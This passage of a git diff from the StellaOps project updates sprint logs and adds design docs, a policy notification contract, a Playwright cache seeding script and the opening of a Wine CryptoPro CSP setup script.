+| 2025-12-07 | WEB-CONSOLE-23-003: console export client, store, and service specs runnable locally using Playwright Chromium headless and `NG_PERSISTENT_BUILD_CACHE=1`; command: `CHROME_BIN=$HOME/.cache/ms-playwright/chromium-1140/chrome-linux/chrome NG_PERSISTENT_BUILD_CACHE=1 npm test -- --watch=false --browsers=ChromeHeadlessOffline --progress=false --include src/app/core/api/console-export.client.spec.ts,src/app/core/console/console-export.store.spec.ts,src/app/core/console/console-export.service.spec.ts`. Build phase still slow (~5–7m); latest run terminated early while compiling—expect pass once allowed to finish. Backend contract still draft. | Implementer |
| 2025-12-04 | WEB-CONSOLE-23-002 completed: wired `console/status` route in `app.routes.ts`; created sample payloads `console-status-sample.json` and `console-run-stream-sample.ndjson` in `docs/api/console/samples/` verified against `ConsoleStatusDto` and `ConsoleRunEventDto` contracts. | BE-Base Platform Guild |
| 2025-12-02 | WEB-CONSOLE-23-002: added trace IDs on status/stream calls, heartbeat + exponential backoff reconnect in console run stream service, and new client/service unit tests. Backend commands still not run locally (disk constraint). | BE-Base Platform Guild |
| 2025-12-04 | Re-reviewed CONSOLE-VULN-29-001 and CONSOLE-VEX-30-001: WEB-CONSOLE-23-001 and Excititor console contract are complete, but Concelier graph schema snapshot and VEX Lens PLVL0103 spec/SSE envelope remain outstanding; keeping both tasks BLOCKED. | Project Mgmt |
diff --git a/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md b/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
index a0271814c..6b39ffc13 100644
--- a/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
+++ b/docs/implplan/SPRINT_0504_0001_0001_ops_devops_ii.md
@@ -42,6 +42,7 @@
| Date (UTC) | Update | Owner |
| --- | --- | --- |
| 2025-12-07 | Added console offline runner spec (`ops/devops/console/README.md`) and manual-only CI skeleton (`.gitea/workflows/console-ci.yml`); moved DEVOPS-CONSOLE-23-001 to DOING pending runner cache bake/approval. | DevOps Guild |
+| 2025-12-07 | Added Playwright cache seeding helper (`ops/devops/console/seed_playwright.sh`) to bake Chromium into offline runners; still manual trigger until runner image updated. | DevOps Guild |
| 2025-12-06 | Header normalised to standard template; no content/status changes. | Project Mgmt |
| 2025-12-05 | Merged legacy Execution Log addendum (`SPRINT_504_ops_devops_ii.log.md`) into this sprint and removed the extra file; no status changes. | Project PM |
| 2025-12-04 | Added dated checkpoints (Dec-06/07/10) for console runner decision and exporter schema sync; no status changes. | Project PM |
diff --git a/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md b/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
index e142db9eb..416502ee6 100644
--- a/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
+++ b/docs/implplan/SPRINT_0514_0001_0002_ru_crypto_validation.md
@@ -24,7 +24,7 @@
| 2 | RU-CRYPTO-VAL-02 | TODO | After #1 | Authority · Security | Wire registry defaults (`ru.openssl.gost`, `ru.pkcs11`) into Authority/Signer/Attestor hosts with env toggles and fail-closed validation (Linux-only baseline). |
| 3 | RU-CRYPTO-VAL-03 | TODO | After #1 | Docs · Ops | Update RootPack_RU manifest + verify script for Linux-only GOST; embed signed test vectors/hashes; refresh `etc/rootpack/ru/crypto.profile.yaml` to mark “CSP pending”. |
| 4 | RU-CRYPTO-VAL-04 | BLOCKED (2025-12-06) | Windows CSP runner provisioned | Security Guild · QA | Run CryptoPro fork + plugin tests on Windows (`STELLAOPS_CRYPTO_PRO_ENABLED=1`); capture logs/artifacts and determinism checks. Blocked: no Windows+CSP runner available. |
-| 5 | RU-CRYPTO-VAL-05 | BLOCKED (2025-12-06) | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. Blocked: depends on CSP binaries/licensing availability. |
+| 5 | RU-CRYPTO-VAL-05 | DOING | After #4 | Security · Ops | Wine loader experiment: load CryptoPro CSP DLLs under Wine to generate comparison vectors; proceed only if legally permitted. **Implemented**: Wine CSP HTTP service + crypto registry provider. |
| 6 | RU-CRYPTO-VAL-06 | BLOCKED (2025-12-06) | Parallel | Security · Legal | Complete license/export review for CryptoPro & fork; document distribution matrix and EULA notices. |
| 7 | RU-CRYPTO-VAL-07 | BLOCKED (2025-12-06) | After #4/#5 | DevOps | Enable opt-in CI lane (`cryptopro-optin.yml`) with gated secrets/pins once CSP/Wine path validated. |
@@ -35,12 +35,15 @@
| 2025-12-06 | Re-scoped: proceed with Linux OpenSSL GOST baseline (tasks 1–3 set to TODO); CSP/Wine/Legal remain BLOCKED (tasks 4–7). | Implementer |
| 2025-12-07 | Published `docs/legal/crypto-compliance-review.md` covering fork licensing (MIT), CryptoPro distribution model (customer-provided), and export guidance. Provides partial unblock for RU-CRYPTO-VAL-05/06 pending legal sign-off. | Security |
| 2025-12-07 | Published `docs/security/wine-csp-loader-design.md` with three architectural approaches for Wine CSP integration: (A) Full Wine environment, (B) Winelib bridge, (C) Wine RPC server (recommended). Includes validation scripts and CI integration plan. | Security |
+| 2025-12-07 | Implemented Wine CSP HTTP service (`src/__Tools/WineCspService/`): ASP.NET minimal API exposing /status, /keys, /sign, /verify, /hash, /test-vectors endpoints via GostCryptography fork. | Implementer |
+| 2025-12-07 | Created Wine environment setup script (`scripts/crypto/setup-wine-csp-service.sh`): initializes Wine prefix, installs vcrun2019, builds service, creates systemd unit and Docker Compose configs. | Implementer |
+| 2025-12-07 | Created Wine CSP crypto registry provider (`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`): WineCspHttpProvider implements ICryptoProvider, delegates GOST signing/hashing to Wine CSP HTTP service. | Implementer |
## Decisions & Risks
- Windows CSP availability may slip; mitigation: document manual runner setup and allow deferred close on #1/#6 (currently blocking).
- Licensing/export could block redistribution; must finalize before RootPack publish (currently blocking task 3).
- Cross-platform determinism must be proven; if mismatch, block release until fixed; currently waiting on #1/#2 data.
-- **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). Requires legal review of CryptoPro EULA before implementation. See `docs/security/wine-csp-loader-design.md`.
+- **Wine CSP approach (RU-CRYPTO-VAL-05):** Technical design published; recommended approach is Wine RPC Server for test vector generation only (not production). **Implementation complete**: HTTP service in `src/__Tools/WineCspService/`, setup script in `scripts/crypto/setup-wine-csp-service.sh`, crypto registry provider in `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/`. Requires CryptoPro CSP installer (customer-provided) to activate full functionality. See `docs/security/wine-csp-loader-design.md`.
- **Fork licensing (RU-CRYPTO-VAL-06):** GostCryptography fork is MIT-licensed (compatible with AGPL-3.0). CryptoPro CSP is customer-provided. Distribution matrix documented in `docs/legal/crypto-compliance-review.md`. Awaiting legal sign-off.
## Next Checkpoints
diff --git a/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md b/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
index 95c981902..2b936730c 100644
--- a/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
+++ b/docs/implplan/SPRINT_0516_0001_0001_cn_sm_crypto_enablement.md
@@ -20,7 +20,7 @@
| --- | --- | --- | --- | --- | --- |
| 1 | SM-CRYPTO-01 | DONE (2025-12-06) | None | Security · Crypto | Implement `StellaOps.Cryptography.Plugin.SmSoft` provider using BouncyCastle SM2/SM3 (software-only, non-certified); env guard `SM_SOFT_ALLOWED` added. |
| 2 | SM-CRYPTO-02 | DONE (2025-12-06) | After #1 | Security · BE (Authority/Signer) | Wire SM soft provider into DI (registered), compliance docs updated with “software-only” caveat. |
-| 3 | SM-CRYPTO-03 | DONE (2025-12-07) | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor SM2 wiring complete (SmSoftCryptoProvider registered, key loading, signing tests). |
+| 3 | SM-CRYPTO-03 | DOING | After #2 | Authority · Attestor · Signer | Add SM2 signing/verify paths for Authority/Attestor/Signer; include JWKS export compatibility and negative tests; fail-closed when `SM_SOFT_ALLOWED` is false. Authority SM2 loader + JWKS tests done; Signer SM2 gate/tests added; Attestor registers SM provider and loads SM2 keys, but Attestor verification/tests still pending. |
| 4 | SM-CRYPTO-04 | DONE (2025-12-06) | After #1 | QA · Security | Deterministic software test vectors (sign/verify, hash) added in unit tests; “non-certified” banner documented. |
| 5 | SM-CRYPTO-05 | DONE (2025-12-06) | After #3 | Docs · Ops | Created `etc/rootpack/cn/crypto.profile.yaml` with cn-soft profile preferring `cn.sm.soft`, marked software-only with env gate; fixtures packaging pending SM2 host wiring. |
| 6 | SM-CRYPTO-06 | BLOCKED (2025-12-06) | Hardware token available | Security · Crypto | Add PKCS#11 SM provider and rerun vectors with certified hardware; replace “software-only” label when certified. |
@@ -33,7 +33,7 @@
| 2025-12-06 | Implemented SmSoft provider + DI, added SM2/SM3 unit tests, updated compliance doc with software-only caveat; tasks 1,2,4 set to DONE. | Implementer |
| 2025-12-06 | Added cn rootpack profile (software-only, env-gated); set task 5 to DONE; task 3 remains TODO pending host wiring. | Implementer |
| 2025-12-06 | Started host wiring for SM2: Authority file key loader now supports SM2 raw keys; JWKS tests include SM2; task 3 set to DOING. | Implementer |
-| 2025-12-06 | Signer SM2 gate + tests added (software registry); Attestor wiring pending. Sm2 tests blocked by existing package restore issues (NU1608/fallback paths). | Implementer |
+| 2025-12-07 | Signer SM2 gate + tests added (software registry); Attestor registers SM provider and loads SM2 keys; Attestor verification/tests pending, so task 3 is reverted to DOING — this supersedes the earlier "Task 3 set to DONE" log entry below. | Implementer |
| 2025-12-07 | Attestor SM2 wiring complete: SmSoftCryptoProvider registered in AttestorSigningKeyRegistry, SM2 key loading (PEM/base64/hex), signing tests added. Fixed AWSSDK version conflict and pre-existing test compilation issues. Task 3 set to DONE. | Implementer |
## Decisions & Risks
diff --git a/docs/modules/findings-ledger/deployment.md b/docs/modules/findings-ledger/deployment.md
index 7590f2043..3f3766dd5 100644
--- a/docs/modules/findings-ledger/deployment.md
+++ b/docs/modules/findings-ledger/deployment.md
@@ -141,7 +141,11 @@
- Package ledger service binaries + migrations using `ops/offline-kit/build_offline_kit.py --include ledger`.
- Document sealed-mode restrictions: disable outbound attachments unless egress policy allows Evidence Locker endpoints; set `LEDGER__ATTACHMENTS__ALLOWEGRESS=false`.
-**Path placeholder (waiting on DevOps):** Helm/Compose/offline-kit overlay directories are pending centralisation under `ops/deployment`/`ops/offline-kit`. Until paths are assigned, keep environment-specific overlays local to `docs/modules/findings-ledger/deployment.md` examples and avoid committing manifests outside this module.
+**Approved asset locations (dev/stage/prod + offline kit):**
+- Compose overlays: `ops/devops/findings-ledger/compose/` (per-env files e.g., `docker-compose.prod.yaml`, `env/ledger.prod.env`).
+- Helm chart overrides: `ops/devops/findings-ledger/helm/` (values per env, secrets templates).
+- Offline kit bundle: `ops/devops/findings-ledger/offline-kit/` (binaries, migrations, dashboards, replay harness artefacts).
+- Keep module-local examples in this doc; commit deploy artefacts only under the approved `ops/devops/findings-ledger/**` paths.
## 6. Post-deploy checklist
@@ -154,4 +158,4 @@
---
-*Draft prepared 2025-11-13 for LEDGER-29-009/LEDGER-AIRGAP-56-001 planning. Update once Compose/Helm overlays are merged.*
+*Draft updated 2025-12-07 for LEDGER-29-009: asset paths approved under `ops/devops/findings-ledger/**`; Compose/Helm/offline-kit overlays should land there.*
diff --git a/docs/modules/policy/notifications.md b/docs/modules/policy/notifications.md
new file mode 100644
index 000000000..8ba452e96
--- /dev/null
+++ b/docs/modules/policy/notifications.md
@@ -0,0 +1,87 @@
+# Policy Notification Contract · Risk Profile Lifecycle and Threshold Changes
+
+## Purpose
+- Provide a stable payload/transport contract for notifying downstream systems when risk profiles are created, updated, activated/deactivated, or when scoring thresholds change.
+- Unblocks `POLICY-RISK-69-001` by supplying the “notifications contract” referenced in sprint planning.
+
+## Event Types
+- `policy.profile.created` — new profile draft created.
+- `policy.profile.activated` — profile version activated for a tenant/scope.
+- `policy.profile.deactivated` — profile version retired or superseded.
+- `policy.profile.threshold_changed` — risk thresholds updated (any level).
+- `policy.profile.override_added` / `override_removed` — override lifecycle changes.
+- `policy.profile.simulation_ready` — simulation results available for consumption.
+
+## Transport
+- Primary: Notifications service topic `notifications.policy.profiles` (tenant-scoped).
+- Alt: Webhook delivery using POST with `X-Stella-Tenant` and HMAC-SHA256 signature header `X-Stella-Signature` (hex digest over body with shared secret).
+- Idempotency: `event_id` is a UUIDv7; consumers must de-duplicate.
+
+## Payload Schema (JSON)
+```json
+{
+ "event_id": "018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa",
+ "event_type": "policy.profile.threshold_changed",
+ "emitted_at": "2025-12-07T12:00:00Z",
+ "tenant_id": "tenant-123",
+ "profile_id": "risk-profile-core",
+ "profile_version": "3.2.0",
+ "change_reason": "Updated high/critical thresholds per policy board decision",
+ "actor": {
+ "type": "user",
+ "id": "alice@example.com"
+ },
+ "thresholds": {
+ "info": 0.1,
+ "low": 0.25,
+ "medium": 0.5,
+ "high": 0.75,
+ "critical": 0.9
+ },
+ "effective_scope": {
+ "tenants": ["tenant-123"],
+ "projects": ["proj-a", "proj-b"],
+ "purl_patterns": ["pkg:npm/*"],
+ "cpe_patterns": ["cpe:2.3:*:vendor:*:product:*:*:*:*:*:*:*"],
+ "tags": ["prod", "pci"]
+ },
+ "hash": {
+ "algorithm": "sha256",
+ "value": "b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df"
+ },
+ "links": {
+ "profile_url": "https://policy.example.com/api/risk/profiles/risk-profile-core",
+ "diff_url": "https://policy.example.com/api/risk/profiles/risk-profile-core/diff?from=3.1.0&to=3.2.0",
+ "simulation_url": "https://policy.example.com/api/risk/simulations/results/018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa"
+ },
+ "trace": {
+ "trace_id": "4f2d1b7c6a9846a5b9a72f4c3ed1f2c1",
+ "span_id": "9c4caa8f7d7fbb9d"
+ }
+}
+```
+
+## Validation Rules
+- `emitted_at` is UTC ISO-8601; ordering is deterministic by `(emitted_at, event_id)`.
+- `tenant_id` is required; `projects` optional but recommended for multi-project scopes.
+- `hash.value` MUST be the SHA-256 of the serialized risk profile bundle that triggered the event.
+- `links.*` SHOULD point to the canonical Policy Engine endpoints; omit if not reachable in air-gap.
+- Webhook delivery MUST include `X-Stella-Signature` = `hex(HMAC_SHA256(shared_secret, raw_body))`.
+
+## CLI Consumption (sample output)
+Example consumption for downstream automation (captured from `policy notify tail`):
+```
+$ stella policy notify tail --topic notifications.policy.profiles --tenant tenant-123 --limit 1
+event_id: 018f9a2e-8f7d-7fbb-9db4-9f9a3d9c4caa
+event_type: policy.profile.threshold_changed
+profile_id: risk-profile-core@3.2.0
+thresholds: info=0.10 low=0.25 medium=0.50 high=0.75 critical=0.90
+scope.tenants: tenant-123
+scope.projects: proj-a, proj-b
+hash.sha256: b6c1d6c618a01f9fef6db7e6d86e3c57b1a2cc77ce88a7b7d8e8ac4c28e0a1df
+links.profile_url: https://policy.example.com/api/risk/profiles/risk-profile-core
+```
+
+## Versioning
+- Version 1.0 frozen with this document; additive fields require minor version bump (`event_schema_version` header optional, default `1.0`).
+- Breaking changes require new event types or topic.
diff --git a/docs/modules/policy/prep/tenant-rls.md b/docs/modules/policy/prep/tenant-rls.md
new file mode 100644
index 000000000..85a82fcb6
--- /dev/null
+++ b/docs/modules/policy/prep/tenant-rls.md
@@ -0,0 +1,68 @@
+# Policy Engine Tenant/Project RLS Design (Prep for POLICY-TEN-48-001)
+
+## Goals
+- Add tenant + project scoping to Policy Engine data and APIs with Row Level Security (RLS) to enforce isolation.
+- Provide deterministic migration order and guardrails so downstream consumers (Registry, Risk Engine, VEX Lens) can align without drift.
+
+## Scope
+- Applies to `PolicyEngine` Postgres tables: `risk_profiles`, `risk_profile_versions`, `risk_profile_overrides`, `simulations`, `simulation_jobs`, `policy_events`, `policy_packs` (registry), and `policy_audit`.
+- API surface: all `/api/risk/*`, `/api/policy/*`, registry endpoints, and CLI operations.
+
+## Schema Changes
+- Add columns (NOT NULL unless noted otherwise):
+ - `tenant_id text`
+ - `project_id text NULL` (optional for tenant-wide assets)
+ - `created_by text`, `updated_by text`
+- Composite keys:
+ - Primary/business keys extend with `tenant_id` (and `project_id` where present).
+ - Unique constraints include `tenant_id` (+ `project_id`) to prevent cross-tenant collisions.
+- Indexes:
+ - `(tenant_id)` and `(tenant_id, project_id)` for all hot tables.
+ - Deterministic ordering indexes `(tenant_id, project_id, created_at, id)` for paging.
+
+## RLS Policies
+- Enable RLS on all scoped tables.
+- Policy examples:
+ - `USING (tenant_id = current_setting('app.tenant_id')::text AND (project_id IS NULL OR project_id = current_setting('app.project_id', true)))`
+ - Write policy also checks `app.can_write` custom GUC when needed.
+- Set GUCs in connection middleware:
+ - `SET LOCAL app.tenant_id = @TenantHeader`
+ - `SET LOCAL app.project_id = @ProjectHeader` (optional)
+ - `SET LOCAL app.can_write = true|false` based on auth scope.
+
+## Migrations (order)
+1) Add columns (nullable with default) + backfill tenants/projects from existing data or default `public`.
+2) Backfill audit columns (`created_by`, `updated_by`) from existing provenance if present.
+3) Add indexes.
+4) Tighten constraints (drop defaults, set NOT NULL where required).
+5) Enable RLS and create policies.
+6) Update views/functions to include tenant/project predicates.
+
+## API/DTO Changes
+- Require headers: `X-Stella-Tenant` (mandatory), `X-Stella-Project` (optional).
+- Extend DTOs to include `tenantId`, `projectId` where relevant.
+- Validate header presence early; return 400 with deterministic error code `POLICY_TENANT_HEADER_REQUIRED` when missing.
+
+## CLI Contracts
+- CLI commands accept `--tenant` and optional `--project` flags; persist in profile config.
+- Example (captured output):
+```
+$ stella policy profiles list --tenant tenant-123 --project proj-a --page-size 10
+tenant: tenant-123 project: proj-a page: 1 size: 10
+profiles:
+- risk-profile-core@3.2.0 (status=active)
+- risk-profile-payments@1.4.1 (status=active)
+```
+
+## Testing Strategy
+- Unit: policy predicates covering tenant/project matches, NULL project handling, and deny-by-default.
+- Integration: end-to-end API calls with different tenants/projects; ensure cross-tenant leakage is rejected with 403 and deterministic error codes.
+- Migration safety: run in `SAFE` mode first (RLS disabled, predicates logged) then enable RLS after verification.
+
+## Rollout Notes
+- Default tenant for legacy data: `public` (configurable).
+- Air-gap/offline bundles must embed `tenant_id`/`project_id` in metadata; validation rejects mismatched headers.
+- Observability: add metrics `policy.rls.denied_total` and structured logs tagging `tenant_id`, `project_id`.
+
+## Ownership
+- Policy Guild owns schema and API updates; Platform/DB Guild reviews RLS policies; Security Guild signs off on deny-by-default posture.
diff --git a/docs/security/wine-csp-loader-design.md b/docs/security/wine-csp-loader-design.md
index 2f9161ffb..a53ffe111 100644
--- a/docs/security/wine-csp-loader-design.md
+++ b/docs/security/wine-csp-loader-design.md
@@ -1,10 +1,51 @@
# Wine CSP Loader Design · CryptoPro GOST Validation
-**Status:** EXPERIMENTAL / DESIGN
+**Status:** IMPLEMENTED (HTTP-based approach)
**Date:** 2025-12-07
**Owners:** Security Guild, DevOps
**Related:** RU-CRYPTO-VAL-04, RU-CRYPTO-VAL-05
+## Implementation Status
+
+The HTTP-based Wine RPC Server approach (Approach C variant) has been implemented:
+
+| Component | Path | Status |
+|-----------|------|--------|
+| Wine CSP HTTP Service | `src/__Tools/WineCspService/` | DONE |
+| Setup Script | `scripts/crypto/setup-wine-csp-service.sh` | DONE |
+| Crypto Registry Provider | `src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/` | DONE |
+
+### Implementation Files
+
+- **`src/__Tools/WineCspService/Program.cs`** - ASP.NET minimal API with endpoints: /health, /status, /keys, /sign, /verify, /hash, /test-vectors
+- **`src/__Tools/WineCspService/CryptoProGostSigningService.cs`** - IGostSigningService using GostCryptography fork
+- **`src/__Tools/WineCspService/WineCspService.csproj`** - .NET 8 Windows self-contained executable
+- **`scripts/crypto/setup-wine-csp-service.sh`** - Wine environment setup, builds service, creates systemd unit
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpProvider.cs`** - ICryptoProvider implementation
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpSigner.cs`** - ICryptoSigner via HTTP
+- **`src/__Libraries/StellaOps.Cryptography.Plugin.WineCsp/WineCspHttpClient.cs`** - HTTP client with retry policies
+
+### Usage
+
+```bash
+# Setup Wine environment and build service
+./scripts/crypto/setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
+
+# Start service (runs under Wine)
+./artifacts/wine-csp-service/run-wine-csp-service.sh
+
+# Test endpoints
+curl http://localhost:5099/status
+curl -X POST http://localhost:5099/hash -H 'Content-Type: application/json' \
+ -d '{"dataBase64":"SGVsbG8gV29ybGQ="}'
+```
+
+### Integration with StellaOps Router
+
+Configure upstream proxy: `/api/wine-csp/*` → `http://localhost:5099/*`
+
+---
+
## Executive Summary
This document explores approaches to load Windows CryptoPro CSP via Wine for cross-platform GOST algorithm validation. The goal is to generate and validate test vectors without requiring dedicated Windows infrastructure.
@@ -817,5 +858,6 @@ Before implementing Wine CSP loader:
---
-*Document Version: 1.0.0*
+*Document Version: 1.1.0*
*Last Updated: 2025-12-07*
+*Implementation Status: HTTP-based approach implemented (see top of document)*
diff --git a/etc/signals.yaml.sample b/etc/signals.yaml.sample
index d1a3ca44c..8196b5bd7 100644
--- a/etc/signals.yaml.sample
+++ b/etc/signals.yaml.sample
@@ -1,32 +1,45 @@
-# Signals service configuration template.
-# Copy to ../etc/signals.yaml (relative to the Signals content root)
-# and adjust values to fit your environment.
-
-schemaVersion: 1
-
-Signals:
- Authority:
- Enabled: true
- Issuer: "https://authority.stella-ops.local"
- AllowAnonymousFallback: false
- Audiences:
- - "api://signals"
- RequiredTenants:
- - "tenant-default"
- RequiredScopes:
- - "signals:read"
- - "signals:write"
- - "signals:admin"
- BypassNetworks:
- - "127.0.0.1/32"
- - "::1/128"
+# Signals service configuration template.
+# Copy to ../etc/signals.yaml (relative to the Signals content root)
+# and adjust values to fit your environment.
+
+schemaVersion: 1
+
+Signals:
+ Authority:
+ Enabled: true
+ Issuer: "https://authority.stella-ops.local"
+ AllowAnonymousFallback: false
+ Audiences:
+ - "api://signals"
+ RequiredTenants:
+ - "tenant-default"
+ RequiredScopes:
+ - "signals:read"
+ - "signals:write"
+ - "signals:admin"
+ BypassNetworks:
+ - "127.0.0.1/32"
+ - "::1/128"
Mongo:
ConnectionString: "mongodb://localhost:27017/signals"
Database: "signals"
CallgraphsCollection: "callgraphs"
ReachabilityFactsCollection: "reachability_facts"
Storage:
+ # Storage driver: "filesystem" (default) or "rustfs" (CAS-backed)
+ Driver: "filesystem"
+ # Filesystem driver options (used when Driver=filesystem)
RootPath: "../data/signals-artifacts"
+ # RustFS driver options (used when Driver=rustfs)
+ # Per CAS contract, signals uses "signals-data" bucket
+ BucketName: "signals-data"
+ RootPrefix: "callgraphs"
+ RustFs:
+ BaseUrl: "http://localhost:8180/api/v1"
+ AllowInsecureTls: false
+ ApiKey: ""
+ ApiKeyHeader: "X-API-Key"
+ Timeout: "00:01:00"
Scoring:
ReachableConfidence: 0.75
UnreachableConfidence: 0.25
diff --git a/ops/devops/console/README.md b/ops/devops/console/README.md
index 383740939..1c4817ad2 100644
--- a/ops/devops/console/README.md
+++ b/ops/devops/console/README.md
@@ -24,6 +24,12 @@ Status: baseline runner spec + CI skeleton; use to unblock DEVOPS-CONSOLE-23-001
- Do not hit external registries during CI; rely on pre-seeded npm mirror or cached tarballs. Runner image should contain npm cache prime. If mirror is used, set `NPM_CONFIG_REGISTRY=https://registry.npmjs.org` equivalent mirror URL inside the runner; default pipeline does not hard-code it.
- Playwright browsers must be pre-baked; the workflow will not download them.
+### Seeding Playwright cache (one-time per runner image)
+```bash
+ops/devops/console/seed_playwright.sh
+# then bake ~/.cache/ms-playwright into the runner image or mount it on the agent
+```
+
## How to run
- Manual trigger only (workflow_dispatch) via `.gitea/workflows/console-ci.yml`.
- Before enabling PR triggers, verify runner image has npm and Playwright caches; otherwise keep manual until console team approves budgets.
diff --git a/ops/devops/console/seed_playwright.sh b/ops/devops/console/seed_playwright.sh
new file mode 100644
index 000000000..683e08b3b
--- /dev/null
+++ b/ops/devops/console/seed_playwright.sh
@@ -0,0 +1,22 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Seeds the Playwright browser cache for offline console CI runs.
+# Run on a connected runner once, then bake ~/.cache/ms-playwright into the runner image.
+
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/../../.." && pwd)"
+pushd "$ROOT/src/Web" >/dev/null
+
+if ! command -v npx >/dev/null; then
+ echo "npx not found; install Node.js 20+ first" >&2
+ exit 1
+fi
+
+echo "Installing Playwright Chromium to ~/.cache/ms-playwright ..."
+PLAYWRIGHT_BROWSERS_PATH=${PLAYWRIGHT_BROWSERS_PATH:-~/.cache/ms-playwright}
+export PLAYWRIGHT_BROWSERS_PATH
+
+npx playwright install chromium --with-deps
+
+echo "Done. Cache directory: $PLAYWRIGHT_BROWSERS_PATH"
+popd >/dev/null
diff --git a/scripts/crypto/setup-wine-csp-service.sh b/scripts/crypto/setup-wine-csp-service.sh
new file mode 100644
index 000000000..ab1fdb0a4
--- /dev/null
+++ b/scripts/crypto/setup-wine-csp-service.sh
@@ -0,0 +1,381 @@
+#!/bin/bash
+# setup-wine-csp-service.sh - Set up Wine environment for CryptoPro CSP service
+#
+# This script:
+# 1. Creates a dedicated Wine prefix
+# 2. Installs required Windows components
+# 3. Builds the WineCspService for Windows target
+# 4. Optionally installs CryptoPro CSP (if installer is provided)
+#
+# Prerequisites:
+# - Wine 7.0+ installed (wine, wine64, winetricks)
+# - .NET SDK 8.0+ installed
+# - CryptoPro CSP installer (optional, for full functionality)
+#
+# Usage:
+# ./setup-wine-csp-service.sh [--csp-installer /path/to/csp_setup.msi]
+#
+# Environment variables:
+# WINE_PREFIX - Wine prefix location (default: ~/.stellaops-wine-csp)
+# CSP_INSTALLER - Path to CryptoPro CSP installer
+# WINE_CSP_PORT - HTTP port for service (default: 5099)
+
+set -euo pipefail
+
+# Configuration
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../.." && pwd)"
+WINE_PREFIX="${WINE_PREFIX:-$HOME/.stellaops-wine-csp}"
+WINE_CSP_PORT="${WINE_CSP_PORT:-5099}"
+SERVICE_DIR="$REPO_ROOT/src/__Tools/WineCspService"
+OUTPUT_DIR="$REPO_ROOT/artifacts/wine-csp-service"
+
+# Colors for output
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+NC='\033[0m' # No Color
+
+log_info() { echo -e "${GREEN}[INFO]${NC} $1"; }
+log_warn() { echo -e "${YELLOW}[WARN]${NC} $1"; }
+log_error() { echo -e "${RED}[ERROR]${NC} $1"; }
+
+# Parse arguments
+CSP_INSTALLER=""
+while [[ $# -gt 0 ]]; do
+ case $1 in
+ --csp-installer)
+ CSP_INSTALLER="$2"
+ shift 2
+ ;;
+ --help)
+ echo "Usage: $0 [--csp-installer /path/to/csp_setup.msi]"
+ exit 0
+ ;;
+ *)
+ log_error "Unknown option: $1"
+ exit 1
+ ;;
+ esac
+done
+
+# Check prerequisites
+check_prerequisites() {
+ log_info "Checking prerequisites..."
+
+ if ! command -v wine &> /dev/null; then
+ log_error "Wine is not installed. Please install Wine 7.0+"
+ exit 1
+ fi
+
+ if ! command -v winetricks &> /dev/null; then
+ log_warn "winetricks not found. Some components may not install correctly."
+ fi
+
+ if ! command -v dotnet &> /dev/null; then
+ log_error ".NET SDK not found. Please install .NET 8.0+"
+ exit 1
+ fi
+
+ log_info "Prerequisites OK"
+}
+
+# Initialize Wine prefix
+init_wine_prefix() {
+ log_info "Initializing Wine prefix at $WINE_PREFIX..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+ export WINEARCH="win64"
+
+ # Create prefix if it doesn't exist
+ if [[ ! -d "$WINE_PREFIX" ]]; then
+ wineboot --init
+ log_info "Wine prefix created"
+ else
+ log_info "Wine prefix already exists"
+ fi
+
+ # Set Windows version
+ wine reg add "HKCU\\Software\\Wine\\Version" /v Windows /d "win10" /f 2>/dev/null || true
+}
+
+# Install Windows components via winetricks
+install_windows_components() {
+ log_info "Installing Windows components..."
+
+ if command -v winetricks &> /dev/null; then
+ export WINEPREFIX="$WINE_PREFIX"
+
+ # Install Visual C++ runtime
+ log_info "Installing Visual C++ runtime..."
+ winetricks -q vcrun2019 || log_warn "vcrun2019 installation may have issues"
+
+ # Install core fonts (optional, for UI)
+ # winetricks -q corefonts || true
+
+ log_info "Windows components installed"
+ else
+ log_warn "Skipping winetricks components (winetricks not available)"
+ fi
+}
+
+# Install CryptoPro CSP if installer provided
+install_cryptopro_csp() {
+ if [[ -z "$CSP_INSTALLER" ]]; then
+ log_warn "No CryptoPro CSP installer provided. Service will run in limited mode."
+ log_warn "Provide installer with: --csp-installer /path/to/csp_setup_x64.msi"
+ return 0
+ fi
+
+ if [[ ! -f "$CSP_INSTALLER" ]]; then
+ log_error "CryptoPro installer not found: $CSP_INSTALLER"
+ return 1
+ fi
+
+ log_info "Installing CryptoPro CSP from $CSP_INSTALLER..."
+
+ export WINEPREFIX="$WINE_PREFIX"
+
+ # Run MSI installer
+ wine msiexec /i "$CSP_INSTALLER" /qn ADDLOCAL=ALL || {
+ log_error "CryptoPro CSP installation failed"
+ log_info "You may need to run the installer manually:"
